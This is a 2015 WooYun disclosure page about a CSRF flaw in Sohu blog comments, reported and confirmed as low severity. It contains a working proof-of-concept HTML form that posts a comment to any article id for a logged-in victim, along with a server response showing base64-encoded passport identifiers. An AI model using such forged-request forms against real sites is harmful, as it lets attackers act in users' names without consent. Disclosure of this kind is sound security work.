当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0163282
漏洞标题:
通过制作post请求可以对任何博客文章进行评论
相关厂商:
搜狐
漏洞作者:
路人甲
提交时间:
2015-12-22 12:10
修复时间:
2016-02-04 17:47
公开时间:
2016-02-04 17:47
漏洞类型:
CSRF
危害等级:
自评Rank:
5
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

通过制作用户为其他文章评论的post请求,根据文章ID的更改,便可对已知文章在用户不知情的情况下进行评论

详细说明:

<html>
  <body>
    <form action="http://zhishangjianzhu.blog.sohu.com/a/app/discuss/save.htm?_input_encode=UTF-8" method="POST">
      <input type="hidden" name="from" value="oldBlog" />
      <input type="hidden" name="appid" value="blog" />
      <input type="hidden" name="discusstype" value="0" />
      <input type="hidden" name="content" value="aaa" />
      <input type="hidden" name="itemid" value="310939570" />
      <input type="hidden" name="orixpt" value="emhpc2hhbmdqaWFuemh1QHNvaHUuY29t" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


通过更改itemid的值,只要在用户登陆后没有关闭浏览器之前点击该链接,便能在只能文章id下面进行评论。

漏洞证明:

{"code":0,"msg":"保存成功","comment":{"content":"aaa","passport":"Zmx5bml1QHNvaHUuY29t","id":505509840,"createtime":1450701667232,"unick":"123","uavatar":"http://photo.pic.sohu.com/images/oldblog/person/11111.gif","ulink":"http://#######.blog.sohu.com/","topassport":"MTE1MjcxMzAyM0BxcS5jb20=","sname":"#####","spreadcount":0,"commentcount":2},"data":{"id":#####,"topassport":"MTE1MjcxMzAyM0BxcS5jb20="}}
这个passport不知道算不算敏感信息

修复方案:

验证来源

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-12-22 13:05

厂商回复:

感谢支持。

最新状态:

暂无